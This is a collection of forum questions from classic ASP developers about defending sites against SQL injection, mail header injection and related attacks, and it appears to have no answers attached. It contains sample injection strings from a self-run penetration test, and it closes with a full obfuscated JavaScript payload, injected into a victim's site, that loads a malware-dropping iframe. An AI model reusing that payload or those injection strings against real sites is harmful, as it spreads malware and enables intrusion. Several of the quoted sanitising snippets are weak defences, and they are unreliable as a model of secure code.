Is it possible to "intercept" all calls to conn.execute and have them go to
a checking routine that will either let the command go through or terminate
it if it contains some illegal instructions? My clients company has had its
hacker free status revoked due to the possibility of sql injection. I could
put a function before every single conn.execute but we have hundreds of
them. Just wondering if there is some way of telling it to do something else
first. Maybe I can redefine conn.execute somehow?
I am using the method below to make sure that the query isNumeric and not longer than 4. It's a little snippet I found in another post... It works fine but I'm questioning whether it's enough.
URls like this, itemdetail.asp?-=#&ItemID=906, don't throw any errors because the "ItemID=906" is fine. Does the method used below really protect against SQL Injections in this case?
I have been given a site to redo. In the process of looking at the code, the live site is open to SQL injection. I know what needs to be done but limited time right now to redo correctly. In the interm while I am rewriting the site, will adding a few lines of code as below prevent SQL injection until I have the time to rebuild the functions and move to stored procedures.
Basically client side I added a onKeypress javascript routine to look for ' or " and disallow in login fields ....
Are there specific security precautions (input validations for example) that are documented somewhere to prevent hackers from compromising a credit card ASP application? In particular, can we prevent a buffer overflow by using the LEFT function to grab only the necessary characters from the credit card text field?
I recently built a login page and a friend of mine was working on something similar and said that I need to protect the login from SQL injection. I am not really sure what exactly that is. I think I have a rough idea but can someone explain it to me? In addition, I will need to obviously protect what I built and am not sure how to go about doing that either.
if anybody has a list of dodgy characters that can be used for sql injection attacks so that i can figure out a way to strip them from user inputs? Also if somebody was filling in a form, that inserts into a "memo" field in access could this be used to launch such an attack or would whatever they type simply be inserted into the field? i hope that bit is clear. i have a form field "message" which is a multi line text box, if someone typed into that box
DELETE * FROM Messages WHERE MessageID =1205
or some other command would that simply be inserted in to the database or would the server try and execute the command??
I have heard a lot about SQL Injection. I was wondering how does an injector come to know about the table/column name when they cannot see the asp codes in a website?
I have written several site functions to hopefully prevent against cross-site hacking, sql injection, and url encoding. I also have a symetric key encryption that is pretty basic (which isn't posted here and is total overkill). I was wondering if these functions are protecting well enough, or am I missing some tests?
Function InjFix(val) InjFix=SEncode(Trim(Replace(val,"'","''"))) end Function
Function SEncode(val) SEncode=Server.HtmlEncode(val) end Function
Function URLEncode(val) URLEncode=Server.URLEncode(val) end Function
I have heard a lot about SQL Injection. I was wondering how does an injector come to know about the table/column name when they cannot see the asp codes in a website?
I have feedback forms on several of my sites and recently, they have been plagued with email injection attacks.
The forms are pretty straight-forward. Half a dozen fields get submitted to a formhandler.asp page where the contents are sent to some hard-coded email addresses using ASPmail.
From what I understand about how this works, spambots are used to add carriage returns after some of the form fields and then adding BCCs in to use the form to send out spam to other addresses. Here's an example of the emails I'm getting: .....
I have allways validated user input to pieces prior to integrating it into a SQL statement, in order to avoid SQL Injection attacs. A colleague of mine told me that binding my vars would make them SQL scalar, but I have been left in the dark as to HOW... The web left me none the wiser, as well, so here goes: Anyone got a brief example of binding vars in ASP to get me started?
I believe someone is using my contact form and sending out spam. I'm getting thousands of undeliverable emails.
I don't know anything about asp. Someone who use to work here wrote the form processing script and it seems that all the forms on different domains are being processed by this script. It seems like they didn't do any sort of validation or checks and on one website there are hundreds of pages with the contact form, i could do it in php but that is way too much work.....
I have just started a new job and I'm in charge of the databases at a college. We have a web page that the students can access to see their profile and course details. which is causing problems.
The students have to login into an e-learning site called moodle which is fine (moodle is all written in php). They can from there just browse moodle which has news and a message board etc. They can then also click a link to their profile, it is then directed to an asp page but it uses their login details from the php moodle site to retrieve their details from the database and display on the asp web page.
I have a multi-page ASP web application that uses information sent to it from the client in the Request.Forms collection, the Request.QueryString collection and the Request.Cookie collection.
What I want to do is to sanitise ALL the information sent to EVERY page.
I thought I'd achieve this by having an INCLUDE file inserted at the top of EVERY page.
This include file iterates through EVERY form, querystring and cookie item and removes anything that looks like malicious SQL injections from the values. Having completed this task, the many web pages then access the sanitised Request object with impunity.
One minor drawback is that it doesn't seem to work...I can't update the Request object with the sanitised value. [Error message: VBScript runtime error: Object doesn't suppor this property or method]
Either it's something silly in my coding or it's the wrong approach....please advise accordingly (code below).....
Can anyone find fault with this code? I wrote in in hopes of preventing users from "breaking" SQL queries and getting places they shouldn't by using SQL Injections.
I have been working on this particular project for a little over 2 weeks now. This product contains between 700-900 stored procedures to handle just about all you can imagine within the product. I just personally rewrote/reformatted close to 150 of them myself. Nothing too fancy, mostly a lot of formatting. We have a little down time between Q/A and fixing any bugs they find so I decided to test the security of the site with Cross-Site Scripting and SQL injection. Because SP's are used in pretty much every aspect of the site, the site isnt vunerable to the simple Injection stuff like ' OR 1 = 1 . Instead I've had to try several things which I will get to in a minute. As I have access to all of these SP's and the dB in which they reside, I could easly look at the code and determine what variables are neede to pass in. I've been trying to break the site to give up a database name so I can proceed to check the system tables etc etc - much like a regular hacker would (meaning not cheating by looking at the code). So, I've started my attack by downloading a local version of the login page, changing a few variables and injected somthing like:
'SELECT * FROM INFORMATION_SCHEMA.TABLES
Initially, the statement is passed into the form fields and wont return anything other than a JS popup error. I altered the statement intentionally to break the page
SELECT * FROM INFORMATION_SCHEMA.TA'
and it produces an error giving me the name of the query and its location when I plug the name of the query in the url i.e http://theurl.com/query_folder/query_name/ it fires me off to another folder containing an include file of some sort. When I run that include it gives me the name of a pretty important variable. Apparetly its a variable that determins what dB I should point to.
Now, one of the issues I have is that everything is a stored procedure so trying to hack it is a little more difficult ....
Recently our contact forms on the website have been receiving messages with html links in the text entry fields. I'm assuming that a bot or something is using my mail script and bypassing the contact form.
I have seen posts about most other mail scripts in PHP that say the bots are injecting their own header information and effectively writing the message to their own BCC list.
Does someone have a thread out there about this and what can I do to keep people from sending html links through my forms to their own list. How do I check to see if they're successful or if I'm just getting a bunch of tests hitting the form and that the messages are only coming to me, the specified recipient.
I created an ISAPI dll application to prevent SQL Injection attempts by intercepting the HTTP requests and sanitizing both GET and POST variables (or any combination of both) before the request reaches the intended code. This is especially useful for legacy applications not designed to deal with MS SQL Server Injection attempts. Though this application was designed with MS SQL Server in mind, it can be used with no or minimal changes with other database engines.
This ISAPI is only compatible with Internet Information Server (IIS) 6.0 which comes with Windows 2003. Windows XP uses IIS 5 engine which DOES NOT support ISAPI Wildcard.
One of my server has been compromised from this virus, and I can't seem to block it out! I have shut down the infected server, but I need to figure out how to check for this, and stop it.
The site is running iis5 on Windows2000, the backend DB is SQLServer 2000
Can anyone point me to some good resources for this? Code:
We log hundreds of SQL injection attempts per day -- the type with CAST(0x44004500... AS VARCHAR(4000)). It amuses me that the last thing the attack does is DEALLOCATE its cursor. My SQL Server DBA tells me this makes no difference. So...
Are these hackers cargo cultists? Or am I missing something?
I use dynamic SQL queries in my sites. I know this is bad, but I grew up using Access as a data source and learned bad habits.
One of my MsSQL Server databases has just been hacked, despite me stripping common words/punctuation from the SQL statements - which I thought would prevent injection attack.
What I currently do is this (using three functions to strip out HTML, quotation marks and T-SQL code)
My client received an email from a user who mentioned that by accident they had been typing (over the querystring I guess), and the url had become:
default.asp?pageid='asd
They then received a SQL Server error message.
My client contacted their webhost, who came back to them promptly and talked of 'SQL Injection', they said that we would need to secure the code as well as the permissions on the database(which I believe they have done)..
This is something I had over looked, and started to write a fix for a couple of nights ago...but I dont think its 100%....
Basically I now do this at the top of my default.asp page ...
I am working on an ecommerce app and want to be able to take my entire POST results as one item (or iterate through them) and check for any malicious SQL INJECTION items. After checking/escaping them i want to save them back into the post results. The reason for this is because I have coded the entire app and just learned about the dangers of SQL Injection and rather than going through every post var and fix it I would rather run a function at the beginning of each page.
I've seen plenty of articles and utilities for preventing form injections for ASP.NET, but not too much for classic ASP. Are there any good input validation scripts that you use to avoid form injection attacks? I'm looking for good routines I can reuse on all of my form processing pages.
This is weird, I'm pretty familiar with SQL Injection - but we're getting these weird injection that is writing in the default document or home page. What it's doing is putting in script code at the top or bottom of the home page... it looks something like this:
<script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5 () {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}funct ion q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCo de;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c 9b){ q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36( q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9 b))));}return q4877d47d94d7f;} var q4877d47d9740a='3C7363726970743E696628216D79696129 7B646F63756D656E742E777269746528756E65736361706528 20272533632536392536362537322536312536642536352532 30253733253732253633253364253237253638253734253734 25373025336125326625326625373425373225373525363525 37322536392536652536372537342536662536652536352537 33253265253665253635253734253266253733253635253631 25373225363325363825326525363325363725363925336625 36322536312536312536372536392537322536632625323725 32622534642536312537342536382532652537322536662537 35253665253634253238253464253631253734253638253265 25373225363125366525363425366625366425323825323925 32612533352533352533352533362533372532392532622532 37253634253335253332253338253237253230253737253639 25363425373425363825336425333125333825333125323025 36382536352536392536372536382537342533642533332533 30253337253230253733253734253739253663253635253364 25323725363425363925373325373025366325363125373925 33612532302536652536662536652536352532372533652533 63253266253639253636253732253631253664253635253365 2729293B7D766172206D7969613D747275653B3C2F73637269 70743E';document.write(q4877d47d93974(q4877d47d974 0a));</script>
What it's doing is decoding itself into an iframe that links out to popups that will try and download a virus on your machine. I don't get the popup in my machine because i think i have a newer version of IE. But some people have complained that it is installing a virus on their machine.
Also what is crazy is when I replace the file with a good version. In about 30 mins, it automatically overwritten with the infected version. Also I've noticed it on some other websites that I haven't touched.
Has anyone encountered this before? Because I'm stumped as to the cause of it. I don't see the issue on our dev server. It seems to be IIS on a shared host.